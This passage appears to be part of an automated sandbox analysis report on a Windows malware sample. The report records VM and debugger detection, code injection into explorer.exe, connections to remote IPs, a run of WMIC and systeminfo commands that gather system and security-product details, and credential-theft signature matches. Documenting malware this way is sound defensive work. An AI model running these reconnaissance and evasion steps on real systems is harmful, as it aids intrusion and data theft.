                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.2093454201.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: B126.tmp.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: ROUTE.EXE, 00000021.00000002.3493412295.000001BF53BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF
                  Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: B126.tmp.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: FDDB.exe, 00000008.00000002.4489409357.0000021DDD8E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 1369111422311351951369111422\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77023-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 24/09/2023, 16:13:49\r\nSystem Manufacturer: VVO2mvF2kM2e VE\r\nSystem Model: xFgTSuDp\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: 9YSUS 3PKM9, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'922 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'171 MB\r\nVirtual Memory: In Use: 1'020 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: GvDH5\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.5\r\n [02]: fe80::357a:d50d:a849:be2d\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1369111422311351951369111422\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: B126.tmp.10.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: B126.tmp.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: B126.tmp.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: B126.tmp.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: B126.tmp.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: FDDB.exe, 00000008.00000002.4489924500.0000021DDF5E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                  Source: B126.tmp.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: B126.tmp.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: B126.tmp.10.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: B126.tmp.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: B126.tmp.10.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: B126.tmp.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: B126.tmp.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: B126.tmp.10.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: B126.tmp.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: explorer.exe, 0000000A.00000003.3137125800.0000000003032000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tion PasswordVMware20,11696428655}
                  Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: B126.tmp.10.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: B126.tmp.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                  Source: B126.tmp.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00191B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,15_2_00191B17
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0040471A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,15_2_00191016
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE278EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,8_2_00007FF6DFE278EC
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00620FE3 push dword ptr fs:[00000030h]0_2_00620FE3
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_0209092B mov eax, dword ptr fs:[00000030h]0_2_0209092B
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_02090D90 mov eax, dword ptr fs:[00000030h]0_2_02090D90
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_005DF31B push dword ptr fs:[00000030h]4_2_005DF31B
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_0209092B mov eax, dword ptr fs:[00000030h]4_2_0209092B
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_02090D90 mov eax, dword ptr fs:[00000030h]4_2_02090D90
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_0056092B mov eax, dword ptr fs:[00000030h]6_2_0056092B
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00560D90 mov eax, dword ptr fs:[00000030h]6_2_00560D90
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_006BF374 push dword ptr fs:[00000030h]6_2_006BF374
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_005E092B mov eax, dword ptr fs:[00000030h]7_2_005E092B
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_005E0D90 mov eax, dword ptr fs:[00000030h]7_2_005E0D90
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_0076ED24 push dword ptr fs:[00000030h]7_2_0076ED24
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE22654 GetProcessHeap,RtlReAllocateHeap,8_2_00007FF6DFE22654
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040635C SetUnhandledExceptionFilter,38_2_0040635C
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0040471A
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_00403FC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00403FC0
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_0040635C SetUnhandledExceptionFilter,39_2_0040635C
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0040471A
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_00403FC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00403FC0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: 3E40.exe.2.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.131.253.169 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 190.224.203.37 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeThread created: C:\Windows\explorer.exe EIP: 30519A8Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavThread created: unknown EIP: 11419A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeThread created: unknown EIP: 87A1970Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavThread created: unknown EIP: 2FE1970Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 6580 base: B779C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 6824 base: 7FF6747E2D10 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 2180 base: B779C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 4444 base: 7FF6747E2D10 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 3944 base: B779C0 value: 90Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: PID: 1976 base: 7FF6747E2D10 value: 90Jump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B779C0Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B779C0Jump to behavior
                  Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B779C0Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe18_2_02FE10A5
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe18_2_02FE1016
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv Jump to behavior
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000002.00000000.2093256969.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000002.00000000.2091336304.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_007355EB cpuid 10_2_007355EB
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW,38_2_004010E0
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW,39_2_004010E0
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_00401360 GetNumberFormatW,CreateJobObjectW,GetModuleFileNameW,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesA,EnumDateFormatsW,CreateNamedPipeA,SetFileShortNameW,SetProcessShutdownParameters,GetTimeFormatA,GetModuleFileNameW,TlsSetValue,SetVolumeMountPointW,GetEnvironmentVariableA,SetCalendarInfoW,GetModuleFileNameW,38_2_00401360
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE29224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,8_2_00007FF6DFE29224
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,10_2_006E2198
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: FDDB.exe, 00000008.00000003.3479732751.0000021DDD8ED000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3324616797.0000021DDD8E2000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3325925801.0000021DDD91C000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000002.4489409357.0000021DDD8EF000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3326174771.0000021DDD8E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
